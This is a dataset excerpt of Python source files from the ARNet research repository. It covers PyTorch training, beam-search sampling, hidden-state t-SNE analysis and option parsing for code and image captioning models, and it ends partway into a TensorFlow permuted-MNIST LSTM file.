metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "201528014227051/ARNet",
"score": 2
} |
#### File: ARNet/code_captioning/code_caption_soft_att_rcst.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import ipdb
import random
import torch
import torch.optim as optim
from torch.autograd import Variable
from utils_model import *
from class_soft_att_rcst import *
def ARNet(opt):
if os.path.isdir(opt.rcst_model_save_path) is False:
os.mkdir(opt.rcst_model_save_path)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
model = AttEncodeDecodeARNet(opt)
model.load_state_dict(torch.load(opt.rcst_model_base_path))
model.cuda()
model.train()
encode_decode_criterion = EncodeDecodeCriterion()
current_learning_rate = opt.learning_rate
optimizer = optim.Adam(model.parameters(),
lr=current_learning_rate,
betas=(opt.optim_alpha, opt.optim_beta),
weight_decay=opt.optim_weight_decay)
train_data_index = list(range(len(train_data)))
val_data_index = list(range(len(val_data)))
iter_idx = 0
max_score = 0.0
max_epoch = 0
for epoch in range(opt.max_epochs):
random.shuffle(train_data_index)
if epoch != 0 and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate *= opt.learning_rate_decay_rate
set_lr(optimizer, current_learning_rate)
for start, end in zip(range(0, len(train_data_index), opt.batch_size),
range(opt.batch_size, len(train_data_index), opt.batch_size)):
time_start = time.time()
# wait for synchronize
torch.cuda.synchronize()
current_code_matrix = []
current_comment_matrix = []
current_comment_mask = []
current_comment_next = []
current_batch_index = train_data_index[start:end]
for idx in current_batch_index:
current_code_matrix.append(train_data[idx]['code_matrix'])
current_comment_matrix.append(train_data[idx]['comment_matrix'])
current_comment_mask.append(train_data[idx]['comment_mask'])
current_comment_next.append(train_data[idx]['comment_next'])
current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate])
current_comment_matrix = np.reshape(current_comment_matrix, [-1, opt.comment_truncate])
current_comment_mask = np.reshape(current_comment_mask, [-1, opt.comment_truncate])
current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate])
current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda()
current_comment_matrix_cuda = Variable(torch.from_numpy(current_comment_matrix), requires_grad=False).cuda()
current_comment_mask_cuda = Variable(torch.from_numpy(current_comment_mask), requires_grad=False).cuda()
current_comment_next_cuda = Variable(torch.from_numpy(current_comment_next), requires_grad=False).cuda()
optimizer.zero_grad()
decode_logit_seq, rcst_loss = model.forward(current_code_matrix_cuda,
current_comment_matrix_cuda, current_comment_mask_cuda)
encode_decode_loss = encode_decode_criterion.forward(decode_logit_seq,
current_comment_next_cuda, current_comment_mask_cuda)
# backward
total_loss = encode_decode_loss + rcst_loss
total_loss.backward()
# update params
optimizer.step()
# wait for synchronize
torch.cuda.synchronize()
encode_decode_loss_val = encode_decode_loss.data[0]
rcst_loss_val = rcst_loss.data[0]
iter_idx += 1
time_end = time.time()
print("{} {} epoch: {} lr: {:.8f} encode_decode_loss: {:.3f} rcst_loss: {:.3f} time: {:.3f}".format(iter_idx,
start, epoch, current_learning_rate, encode_decode_loss_val, rcst_loss_val, time_end - time_start))
if np.mod(epoch, 1) == 0:
print("\nepoch {} is done, saving the model ...".format(epoch))
parameter_path = os.path.join(opt.rcst_model_save_path, 'model_epoch-' + str(epoch) + '.pth')
torch.save(model.state_dict(), parameter_path)
print("\nparameter model saved to {}".format(parameter_path))
optimizer_path = os.path.join(opt.rcst_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth')
torch.save(optimizer.state_dict(), optimizer_path)
print("\noptimizer model saved to {}".format(optimizer_path))
model.eval()
greedy_results = []
gts_data = []
for start, end in zip(range(0, len(val_data_index), opt.batch_size),
range(opt.batch_size, len(val_data_index), opt.batch_size)):
current_code_matrix = []
current_comment_matrix = []
current_comment_mask = []
current_comment_next = []
current_batch_index = val_data_index[start:end]
for idx in current_batch_index:
current_code_matrix.append(val_data[idx]['code_matrix'])
current_comment_matrix.append(val_data[idx]['comment_matrix'])
current_comment_mask.append(val_data[idx]['comment_mask'])
current_comment_next.append(val_data[idx]['comment_next'])
current_code_matrix = np.reshape(current_code_matrix, [-1, opt.code_truncate])
current_code_matrix_cuda = Variable(torch.from_numpy(current_code_matrix), requires_grad=False).cuda()
current_comment_next = np.reshape(current_comment_next, [-1, opt.comment_truncate])
greedy_seq, greedy_seq_probs, greedy_logprobs_all = model.sample(current_code_matrix_cuda,
token2index['BOS'], token2index['EOS'])
greedy_seq = greedy_seq.squeeze().cpu().numpy()
for i in range(greedy_seq.shape[0]):
greedy_results.append(greedy_seq[i])
gts_data.append(current_comment_next[i])
avg_score = get_scores(greedy_results, gts_data, token2index['BOS'], token2index['EOS'])
if avg_score[0] >= max_score:
max_score = avg_score[0]
max_epoch = epoch
print("epoch: {} Bleu_1: {:.5f} Bleu_2: {:.5f} Bleu_3: {:.5f} Bleu_4: {:.5f} max_epoch: {}".format(epoch,
avg_score[0], avg_score[1], avg_score[2], avg_score[3], max_epoch))
if __name__ == '__main__':
opt = opts.parse_opt()
ARNet(opt)
```
#### File: ARNet/code_captioning/prepro_tsne_reduction_vis.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import ipdb
import time
import math
import argparse
import numpy as np
import matplotlib.pyplot as plt
from six.moves import cPickle
from sklearn import manifold
def plot_embedding(X, batch_size, title=None):
x_min, x_max = np.min(X, 0), np.max(X, 0)
X = (X - x_min) / (x_max - x_min)
fig = plt.figure()
fig.suptitle(title, fontsize=14, fontweight='bold')
ax = fig.add_subplot(111)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
for i in range(X.shape[0]):
if i < batch_size:
ax.plot(X[i, 0], X[i, 1], color='yellowgreen', marker='.') # teacher forcing hidden states
else:
ax.plot(X[i, 0], X[i, 1], color='orangered', marker='.') # free running hidden states
def cosine_similarity(v1, v2):
"""
compute cosine similarity of v1 to v2: (v1 dot v2)/{||v1||*||v2||)
"""
sumxx, sumxy, sumyy = 0, 0, 0
for i in range(len(v1)):
x = v1[i]
y = v2[i]
sumxx += x*x
sumyy += y*y
sumxy += x*y
return 1.0 - sumxy / math.sqrt(sumxx * sumyy)
def dim_reduction(opt):
teacher_forcing_hidden_reduction = []
free_running_hidden_reduction = []
for start, end in [(opt.vis_batch_size * opt.truncation, opt.vis_batch_size * (opt.truncation + 1))]:
current_teacher_forcing_hidden = teacher_forcing_hidden[start:end, :]
current_free_running_hidden = free_running_hidden[start:end, :]
current_hidden = np.concatenate((current_teacher_forcing_hidden, current_free_running_hidden), axis=0)
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
current_hidden_reduction = tsne.fit_transform(current_hidden)
teacher_forcing_hidden_reduction.append(current_hidden_reduction[0:opt.vis_batch_size, :])
free_running_hidden_reduction.append(current_hidden_reduction[opt.vis_batch_size:, :])
teacher_forcing_hidden_reduction = np.reshape(teacher_forcing_hidden_reduction, [-1, 2])
free_running_hidden_reduction = np.reshape(free_running_hidden_reduction, [-1, 2])
hidden_reduction = np.concatenate((teacher_forcing_hidden_reduction, free_running_hidden_reduction), axis=0)
return hidden_reduction
def calculate_distance(teacher_forcing_hidden, free_running_hidden):
bsize = free_running_hidden.shape[0]
mean_teacher_forcing = np.mean(teacher_forcing_hidden, axis=0)
mean_free_running = np.mean(free_running_hidden, axis=0)
distance_mc = np.sqrt(np.sum(np.square(mean_teacher_forcing - mean_free_running)))
distance_pw = np.sqrt(np.sum(np.square(teacher_forcing_hidden - free_running_hidden), 1))
print("distance_mc: {}".format(distance_mc))
print("distance_pw: {}".format(np.sum(distance_pw) / bsize))
# cosine distance
distance_cosine = 0.0
for i in range(bsize):
current_tf_h = teacher_forcing_hidden[i]
current_fr_h = free_running_hidden[i]
distance_cosine += cosine_similarity(current_tf_h, current_fr_h)
print("cosine distance_pw: {}".format(distance_cosine / bsize))
print("cosine distance_mc: {}".format(cosine_similarity(mean_teacher_forcing, mean_free_running)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--hidden_path', type=str,
default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states.pkl')
parser.add_argument('--hidden_reduction_save_path', type=str,
default='example: models/soft_attention_seed_117/model_epoch-51_hidden_states_reduction.pkl')
parser.add_argument('--vis_batch_size', type=int, default=80)
parser.add_argument('--truncation', type=int, default=20)
opt = parser.parse_args()
with open(opt.hidden_path, 'rb') as f:
hidden_states = cPickle.load(f)
teacher_forcing_hidden = np.squeeze(hidden_states['teacher_forcing'])
free_running_hidden = np.squeeze(hidden_states['free_running'])
# calculate the distances
calculate_distance(teacher_forcing_hidden, free_running_hidden)
# dimensionality reduction
hidden_reduction = dim_reduction(opt)
with open(opt.hidden_reduction_save_path, 'wb') as f:
cPickle.dump(hidden_reduction, f)
# visualize the hidden states after dimensionality reduction
plot_embedding(hidden_reduction, opt.vis_batch_size, "t-SNE visilization")
plt.show()
```
#### File: ARNet/image_captioning/class_ende.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import ipdb
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import *
from classLSTMCore import LSTMCore
class EncoderDecoder(nn.Module):
def __init__(self, opt):
super(EncoderDecoder, self).__init__()
self.vocab_size = opt.vocab_size
self.input_encoding_size = opt.input_encoding_size
self.lstm_size = opt.lstm_size
self.drop_prob_lm = opt.drop_prob_lm
self.seq_length = opt.seq_length
self.fc_feat_size = opt.fc_feat_size
self.img_embed = nn.Linear(self.fc_feat_size, self.input_encoding_size)
self.LSTMCore = LSTMCore(self.input_encoding_size, self.lstm_size, self.drop_prob_lm)
self.embed = nn.Embedding(self.vocab_size + 1, self.input_encoding_size)
self.logit = nn.Linear(self.lstm_size, self.vocab_size)
self.init_weights()
def init_weights(self):
initrange = 0.1
self.img_embed.weight.data.uniform_(-initrange, initrange)
self.img_embed.bias.data.fill_(0)
self.embed.weight.data.uniform_(-initrange, initrange)
self.logit.weight.data.uniform_(-initrange, initrange)
self.logit.bias.data.fill_(0)
def init_hidden(self, batch_size):
weight = next(self.parameters()).data
return (Variable(weight.new(1, batch_size, self.lstm_size).zero_()),
Variable(weight.new(1, batch_size, self.lstm_size).zero_()))
def forward(self, fc_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
for i in range(seq.size(1)):
if i == 0:
xt = self.img_embed(fc_feats)
else:
it = seq[:, i-1].clone()
if seq[:, i-1].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.LSTMCore.forward(xt, state)
if i > 0:
output = F.log_softmax(self.logit(output.squeeze(0)))
outputs.append(output)
return torch.cat([_.unsqueeze(1) for _ in outputs], 1).contiguous()
def sample_beam(self, fc_feats, init_index, opt={}):
beam_size = opt.get('beam_size', 3) # 如果不能取到 beam_size 这个变量, 则令 beam_size 为 3
batch_size = fc_feats.size(0)
seq = torch.LongTensor(self.seq_length, batch_size).zero_()
seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
top_seq = []
top_prob = [[] for _ in range(batch_size)]
done_beams = [[] for _ in range(batch_size)]
for k in range(batch_size):
state = self.init_hidden(beam_size)
beam_seq = torch.LongTensor(self.seq_length, beam_size).zero_()
beam_seq_logprobs = torch.FloatTensor(self.seq_length, beam_size).zero_()
beam_logprobs_sum = torch.zeros(beam_size) # running sum of logprobs for each beam
for t in range(self.seq_length + 1):
if t == 0:
xt = self.img_embed(fc_feats[k:k+1]).expand(beam_size, self.input_encoding_size)
elif t == 1:
it = fc_feats.data.new(beam_size).long().fill_(init_index)
xt = self.embed(Variable(it, requires_grad=False))
else:
logprobsf = logprobs.float()
ys, ix = torch.sort(logprobsf, 1, True)
candidates = []
cols = min(beam_size, ys.size(1))
rows = beam_size
if t == 2: # at first time step only the first beam is active
rows = 1
for c in range(cols):
for q in range(rows):
# compute logprob of expanding beam q with word in (sorted) position c
local_logprob = ys[q, c]
candidate_logprob = beam_logprobs_sum[q] + local_logprob
candidates.append({'c': ix.data[q, c],
'q': q,
'p': candidate_logprob.data[0],
'r': local_logprob.data[0]})
candidates = sorted(candidates, key=lambda x: -x['p'])
# construct new beams
new_state = [_.clone() for _ in state]
if t > 2:
# well need these as reference when we fork beams around
beam_seq_prev = beam_seq[:t-2].clone()
beam_seq_logprobs_prev = beam_seq_logprobs[:t-2].clone()
for vix in range(beam_size):
v = candidates[vix]
# fork beam index q into index vix
if t > 2:
beam_seq[:t - 2, vix] = beam_seq_prev[:, v['q']]
beam_seq_logprobs[:t - 2, vix] = beam_seq_logprobs_prev[:, v['q']]
# rearrange recurrent states
for state_ix in range(len(new_state)):
# copy over state in previous beam q to new beam at vix
new_state[state_ix][0, vix] = state[state_ix][0, v['q']] # dimension one is time step
# append new end terminal at the end of this beam
beam_seq[t - 2, vix] = v['c'] # c'th word is the continuation
beam_seq_logprobs[t - 2, vix] = v['r'] # the raw logprob here
beam_logprobs_sum[vix] = v['p'] # the new (sum) logprob along this beam
if v['c'] == 0 or t == self.seq_length:
# END token special case here, or we reached the end.
# add the beam to a set of done beams
done_beams[k].append({'seq': beam_seq[:, vix].clone(),
'logps': beam_seq_logprobs[:, vix].clone(),
'p': beam_logprobs_sum[vix]})
# encode as vectors
it = beam_seq[t - 2]
xt = self.embed(Variable(it.cuda()))
if t >= 2:
state = new_state
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
done_beams[k] = sorted(done_beams[k], key=lambda x: -x['p'])
seq[:, k] = done_beams[k][0]['seq'] # the first beam has highest cumulative score
seqLogprobs[:, k] = done_beams[k][0]['logps']
# save result
l = len(done_beams[k])
top_seq_cur = torch.LongTensor(l, self.seq_length).zero_()
for temp_index in range(l):
top_seq_cur[temp_index] = done_beams[k][temp_index]['seq'].clone()
top_prob[k].append(done_beams[k][temp_index]['p'])
top_seq.append(top_seq_cur)
# return the samples and their log likelihoods
return seq.transpose(0, 1), seqLogprobs.transpose(0, 1), top_seq, top_prob
def sample(self, fc_feats, init_index, opt={}):
beam_size = opt.get('beam_size', 1)
if beam_size > 1:
return self.sample_beam(fc_feats, init_index, opt)
batch_size = fc_feats.size(0)
seq = []
seqLogprobs = []
logprobs_all = []
state = self.init_hidden(batch_size)
for t in range(self.seq_length):
if t == 0:
xt = self.img_embed(fc_feats)
else:
if t == 1:
it = fc_feats.data.new(batch_size).long().fill_(init_index)
else:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
xt = self.embed(Variable(it, requires_grad=False).cuda())
if t >= 2:
if t == 2:
unfinished = it > 0
else:
unfinished *= (it > 0)
if unfinished.sum() == 0:
break
it = it * unfinished.type_as(it)
seq.append(it)
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
logprobs_all.append(logprobs)
return torch.cat([_.unsqueeze(1) for _ in seq], 1), \
torch.cat([_.unsqueeze(1) for _ in seqLogprobs], 1), \
torch.cat([_.unsqueeze(1) for _ in logprobs_all], 1).contiguous()
def teacher_forcing_get_hidden_states(self, fc_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
for i in range(seq.size(1)):
if i == 0:
xt = self.img_embed(fc_feats)
else:
it = seq[:, i-1].clone()
if seq[:, i-1].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.LSTMCore.forward(xt, state)
if i > 0:
if batch_size == 1:
output = F.log_softmax(self.logit(output))
else:
output = F.log_softmax(self.logit(output.squeeze(0)))
outputs.append(output)
return state[0], outputs
def free_running_get_hidden_states(self, fc_feats, init_index, end_index):
batch_size = fc_feats.size(0)
seq = []
seqLogprobs = []
logprobs_all = []
state = self.init_hidden(batch_size)
for t in range(self.seq_length):
if t == 0:
xt = self.img_embed(fc_feats)
if t == 1:
it = fc_feats.data.new(batch_size).long().fill_(init_index)
xt = self.embed(Variable(it, requires_grad=False).cuda())
if t >= 2:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
if it.cpu().numpy()[0] == end_index:
break
xt = self.embed(Variable(it, requires_grad=False).cuda())
seq.append(it)
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.LSTMCore.forward(xt, state)
logprobs = F.log_softmax(self.logit(output))
logprobs_all.append(logprobs)
return state[0], logprobs_all
```
#### File: ARNet/image_captioning/image_caption_ende_xe.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import ipdb
import random
from six.moves import cPickle
import torch
import torch.optim as optim
from torch.autograd import *
from utils_model import *
from class_ende import *
def train_xe(opt):
opt.vocab_size = len(idx_to_word)
max_CIDEr = 0.0
max_CIDEr_epoch = 0
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
model = EncoderDecoder(opt)
model.cuda()
model.train()
criterion = LanguageModelCriterion()
# check compatibility if training is continued from previously saved model
if vars(opt).get('start_from', None) is not None:
assert os.path.isdir(opt.start_from), " %s must be a a path" % opt.start_from
model.load_state_dict(torch.load(os.path.join(opt.start_from,
'model_epoch-' + str(opt.start_from_epoch) + '.pth')))
current_learning_rate = opt.learning_rate
if opt.optim == 'adam':
optimizer = optim.Adam(model.parameters(),
lr=current_learning_rate,
betas=(opt.optim_alpha, opt.optim_beta),
weight_decay=opt.optim_weight_decay)
else:
raise Exception("optim not supported: {}".format(opt.feature_type))
# load optimizer
if vars(opt).get('start_from', None) is not None:
optimizer.load_state_dict(torch.load(os.path.join(opt.start_from,
'optimizer_epoch-' + str(opt.start_from_epoch) + '.pth')))
set_lr(optimizer, opt.scst_learning_rate)
for epoch in range(opt.max_epochs):
random.shuffle(train_images_names)
if epoch != opt.learning_rate_decay_start and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate *= opt.learning_rate_decay_rate
set_lr(optimizer, current_learning_rate)
for start, end in zip(range(0, len(train_images_names), int(opt.batch_size/opt.seq_per_img)),
range(int(opt.batch_size/opt.seq_per_img), len(train_images_names), int(opt.batch_size/opt.seq_per_img))):
time_start = time.time()
# wait for synchronize
torch.cuda.synchronize()
current_feats_fc = []
current_gt_sents = []
image_names = train_images_names[start:end]
for image_name in image_names:
img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy'))
img_feat_fc = np.reshape(img_feat_fc, [opt.fc_feat_size])
for i in range(opt.seq_per_img):
current_feats_fc.append(img_feat_fc)
current_gt_sents.append(train_images_captions_index[image_name][i])
current_feats_fc = np.reshape(current_feats_fc, [-1, opt.fc_feat_size])
current_gt_sents = np.asarray(current_gt_sents).astype(np.int64)
current_masks = np.zeros((current_gt_sents.shape[0], current_gt_sents.shape[1]), dtype=np.float32)
# in PY3, map is a generator, refer: https://stackoverflow.com/questions/44511752
nonzeros = np.array(list(map(lambda x: (x != 0).sum(), current_gt_sents)))
for ind, row in enumerate(current_masks):
row[:nonzeros[ind]] = 1
current_feats_fc_cuda = Variable(torch.from_numpy(current_feats_fc), requires_grad=False).cuda()
current_gt_sents_cuda = Variable(torch.from_numpy(current_gt_sents), requires_grad=False).cuda()
current_masks_cuda = Variable(torch.from_numpy(current_masks), requires_grad=False).cuda()
# zero gradient
optimizer.zero_grad()
criterion_input = model.forward(current_feats_fc_cuda, current_gt_sents_cuda)
loss = criterion.forward(criterion_input, current_gt_sents_cuda[:, 1:], current_masks_cuda)
# backward
loss.backward()
# clip gradient
# clip_gradient(optimizer, opt.grad_clip)
# update params
optimizer.step()
train_loss = loss.data[0]
# wait for synchronize
torch.cuda.synchronize()
time_end = time.time()
print("idx: {} epoch: {} lr: {:.10f} loss: {:.3f} time: {:.3f}".format(start, epoch, current_learning_rate, train_loss, time_end - time_start))
if np.mod(epoch, 1) == 0:
print("epoch {} is done, saving the model ...".format(epoch))
parameter_path = os.path.join(opt.xe_model_save_path, 'model_epoch-' + str(epoch) + '.pth')
torch.save(model.state_dict(), parameter_path)
print("parameter model saved to {}".format(parameter_path))
optimizer_path = os.path.join(opt.xe_model_save_path, 'optimizer_epoch-' + str(epoch) + '.pth')
torch.save(optimizer.state_dict(), optimizer_path)
print("optimizer model saved to {}".format(optimizer_path))
model.eval()
val_images_sents = []
for idx, image_name in enumerate(val_images_names):
img_feat_fc = np.load(os.path.join(opt.fc_feat_path, image_name + '.npy'))
img_feat_fc = np.reshape(img_feat_fc, [1, opt.fc_feat_size])
img_feat_fc_cuda = Variable(torch.from_numpy(img_feat_fc), requires_grad=False).cuda()
greedy_seq, _, _ = model.sample(img_feat_fc_cuda, word_to_idx['BOS'], {'sample_max': 1})
img_sent = index_to_sentence(list(greedy_seq.cpu().numpy().squeeze(0)))
val_images_sents.append(img_sent)
Bleu_1, Bleu_2, Bleu_3, Bleu_4, CIDEr, METEOR, ROUGE_L, SPICE = evaluate(opt.train_json_path, val_images_names, val_images_sents)
model.train()
if CIDEr >= max_CIDEr:
max_CIDEr = CIDEr
max_CIDEr_epoch = epoch
print('current_CIDEr: {:.5f} max_CIDEr: {:.5f} max_CIDEr_epoch: {}'.format(CIDEr, max_CIDEr, max_CIDEr_epoch))
if epoch - max_CIDEr_epoch > opt.early_stop_value:
print('CIDEr has no improvement, stop. Max CIDEr value: {}, max epoch: {}'.format(max_CIDEr, max_CIDEr_epoch))
sys.exit(0)
if __name__ == '__main__':
opt = opts.parse_opt()
if opt.version == 'offline':
train_images_names = open(opt.train_split, 'r').read().splitlines() + open(opt.restval_split, 'r').read().splitlines()
val_images_names = open(opt.val_split, 'r').read().splitlines()
elif opt.version == 'online':
train_images_names = open(opt.train_split_online, 'r').read().splitlines()
val_images_names = open(opt.val_split_online, 'r').read().splitlines()
if os.path.isdir(opt.xe_model_save_path) is False:
os.mkdir(opt.xe_model_save_path)
train_xe(opt)
```
#### File: ARNet/image_captioning/opts.py
```python
import argparse
import sys
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--function', type=str, default='train_with_mle')
parser.add_argument('--version', type=str, default='offline')
parser.add_argument('--train_annotations', type=str, default='data/annotations/captions_train2014.json')
parser.add_argument('--val_annotations', type=str, default='data/annotations/captions_val2014.json')
# karpathy's splits
parser.add_argument('--train_split', type=str, default='data/splits/coco_train.txt')
parser.add_argument('--test_split', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--val_split', type=str, default='data/splits/coco_val.txt')
parser.add_argument('--restval_split', type=str, default='data/splits/coco_restval.txt')
# official splits
parser.add_argument('--train_split_online', type=str, default='data/splits/coco_train_online.txt')
parser.add_argument('--val_split_online', type=str, default='data/splits/coco_val_online.txt')
# params of preprocessed data
parser.add_argument('--train_val_imageNames_to_imageIDs_path', type=str, default='data/train_val_imageNames_to_imageIDs.pkl')
parser.add_argument('--official_train_captions_path', type=str, default='data/train_images_captions_official.pkl')
parser.add_argument('--official_val_captions_path', type=str, default='data/val_images_captions_official.pkl')
parser.add_argument('--train_images_captions_path', type=str, default='data/train_images_captions.pkl')
parser.add_argument('--val_images_captions_path', type=str, default='data/val_images_captions.pkl')
parser.add_argument('--word_to_idx_path', type=str, default='data/word_to_idx.pkl')
parser.add_argument('--idx_to_word_path', type=str, default='data/idx_to_word.pkl')
parser.add_argument('--bias_init_vector_path', type=str, default='data/bias_init_vector.pkl')
parser.add_argument('--train_images_captions_index', type=str, default='data/train_images_captions_index.pkl')
# params of focal loss
parser.add_argument('--focal_gamma', type=float, default=2)
# batch normalization
parser.add_argument('--epsilon', type=float, default=0.001)
# label smoothing
parser.add_argument('--label_smoothing', type=float, default=0.1)
# params of t-SNE visualization
parser.add_argument('--vis_batch_size', type=int, default=64)
parser.add_argument('--vis_model_path', type=str, default='')
parser.add_argument('--vis_save_path', type=str, default='')
# ARNet
parser.add_argument('--rcst_time', type=int, default=1)
parser.add_argument('--rcst_size', type=int, default=512)
parser.add_argument('--rcst_weight', type=float, default=0.005)
parser.add_argument('--rcst_learning_rate', type=float, default=0.0005)
parser.add_argument('--rcst_model_save_path', type=str, default='')
parser.add_argument('--rcst_model_path', type=str, default='')
parser.add_argument('--rcst_train_json_path', type=str, default='')
# params of ZoneOut
parser.add_argument('--zoneout_factor_cell', type=float, default=0.1)
parser.add_argument('--zoneout_factor_output', type=float, default=0.0)
# ensemble model
parser.add_argument('--ensemble_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--ensemble_json_path', type=str, default='')
parser.add_argument('--ensemble_model_0', type=str, default='')
parser.add_argument('--ensemble_model_1', type=str, default='')
parser.add_argument('--ensemble_model_2', type=str, default='')
parser.add_argument('--ensemble_model_3', type=str, default='')
parser.add_argument('--ensemble_model_4', type=str, default='')
parser.add_argument('--ensemble_model_5', type=str, default='')
# inference function parameters
parser.add_argument('--infer_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--infer_json_path', type=str, default='')
parser.add_argument('--infer_model_path', type=str, default='')
# self-critical training function parameters
parser.add_argument('--grad_clip', type=float, default=0.1,
help='clip gradients at this value')
parser.add_argument('--scst_learning_rate', type=float, default=0.00005)
parser.add_argument('--scst_learning_rate_decay', type=float, default=0.8)
parser.add_argument('--scst_loss_mixed_gamma', type=float, default=0.0016)
parser.add_argument('--scst_batch_size', type=int, default=8)
parser.add_argument('--scst_epochs', type=int, default=200)
parser.add_argument('--reward_method', type=str, default='CIDEr')
parser.add_argument('--scst_base_model_path', type=str, default='')
parser.add_argument('--scst_model_save_path', type=str, default='')
parser.add_argument('--scst_train_json_path', type=str, default='')
# caption_with_beam_search function parameters
parser.add_argument('--beam_model_path', type=str, default='')
parser.add_argument('--beam_file_path', type=str, default='data/splits/coco_test.txt')
parser.add_argument('--beam_json_path', type=str, default='')
parser.add_argument('--beam_size', type=int, default=1)
parser.add_argument('--beam_length_normalization_factor', type=float, default=0.0)
# from <NAME>
parser.add_argument('--train_only', type=int, default=0)
parser.add_argument('--caption_model', type=str, default='caption_model')
parser.add_argument('--input_json', type=str, default='data/cocotalk.json')
parser.add_argument('--input_label_h5', type=str, default='data/cocotalk_label.h5')
parser.add_argument('--load_best_score', type=int, default=0)
parser.add_argument('--temperature', type=float, default=1.0)
# XE 训练的一些参数, 路径
parser.add_argument('--train_json_path', type=str, default='')
parser.add_argument('--model_save_basepath', type=str, default='models')
parser.add_argument('--model_name', type=str, default='')
parser.add_argument('--xe_model_save_path', type=str, default='')
# 从上次训练保存的 model 文件开始接着训练
parser.add_argument('--start_from', type=str, default=None)
parser.add_argument('--start_from_epoch', type=int, default=0)
parser.add_argument('--use_cuda', type=bool, default=True)
parser.add_argument('--seed', type=int, default=110)
parser.add_argument('--max_epochs', type=int, default=100)
parser.add_argument('--seq_per_img', type=int, default=5)
parser.add_argument('--batch_size', type=int, default=80)
parser.add_argument('--early_stop_value', type=int, default=10)
# params of optimizer
parser.add_argument('--optim', type=str, default='adam')
parser.add_argument('--learning_rate', type=float, default=5e-4)
parser.add_argument('--learning_rate_decay_start', type=int, default=0)
parser.add_argument('--learning_rate_decay_every', type=int, default=3)
parser.add_argument('--learning_rate_decay_rate', type=float, default=0.8,)
parser.add_argument('--optim_alpha', type=float, default=0.9)
parser.add_argument('--optim_beta', type=float, default=0.999)
parser.add_argument('--optim_epsilon', type=float, default=1e-8)
parser.add_argument('--optim_weight_decay', type=float, default=0.00001)
# params of ZoneOut
parser.add_argument('--c_ratio', type=float, default=0.0)
parser.add_argument('--h_ratio', type=float, default=0.0)
# params of Scheduled Sampling (SS)
parser.add_argument('--ss_prob', type=float, default=0.0)
parser.add_argument('--ss_start', type=int, default=-1)
parser.add_argument('--ss_increase_every', type=int, default=5)
parser.add_argument('--ss_increase_prob', type=float, default=0.05)
parser.add_argument('--ss_max_prob', type=float, default=0.25)
# params of ReviewNet
parser.add_argument('--n_reviewers', type=int, default=8)
parser.add_argument('--input_encoding_size', type=int, default=512)
parser.add_argument('--lstm_size', type=int, default=512)
parser.add_argument('--lstm_step', type=int, default=30)
parser.add_argument('--seq_length', type=int, default=30)
parser.add_argument('--vocab_size', type=int, default=10516)
parser.add_argument('--word_embed_size', type=int, default=512)
parser.add_argument('--conv_feat_size', type=int, default=1536)
parser.add_argument('--conv_att_size', type=int, default=64)
parser.add_argument('--fc_feat_size', type=int, default=1536)
parser.add_argument('--att_hidden_size', type=int, default=512)
parser.add_argument('--top_word_count', type=int, default=1000)
parser.add_argument('--feature_type', type=str, default='inception_v4')
# conv features and fc features, default is inception-v4
parser.add_argument('--conv_feat_path', type=str, default='data/feats/mscoco_feats_v4_conv')
parser.add_argument('--fc_feat_path', type=str, default='data/feats/mscoco_feats_v4_fc')
args = parser.parse_args()
if args.feature_type == 'inception_v3':
args.conv_feat_path = 'data/feats/train_val_test_feats_v3_conv'
args.fc_feat_path = 'data/feats/train_val_test_feats_v3_fc'
args.conv_feat_size = 1280
args.conv_att_size = 64
args.fc_feat_size = 2048
elif args.feature_type == 'inception_v4':
args.conv_feat_path = 'data/feats/mscoco_feats_v4_conv'
args.fc_feat_path = 'data/feats/mscoco_feats_v4_fc'
args.conv_feat_size = 1536
args.conv_att_size = 64
args.fc_feat_size = 1536
elif args.feature_type == 'densenet':
args.input_fc_dir = 'data/feats/train_val_test_feats_densenet161_conv'
args.input_att_dir = 'data/feats/train_val_test_feats_densenet161_conv'
args.conv_feat_size = 2208
args.conv_att_size = 49
args.fc_feat_size = 2208
return args
if __name__ == '__main__':
opt = parse_opt()
opt_dict = vars(opt)
for k, v in opt_dict.items():
print(k + ': \t' + str(v))
```
#### File: ARNet/permuted_sequential_mnist/tf_permuted_mnist_lstm_rcst.py
```python
import os
import opts
import ipdb
import time
import random
import numpy as np
from six.moves import cPickle
import keras
from keras.datasets import mnist
import tensorflow as tf
class LSTM():
def __init__(self, opt):
self.lstm_step = opt.lstm_step
self.batch_size = opt.batch_size
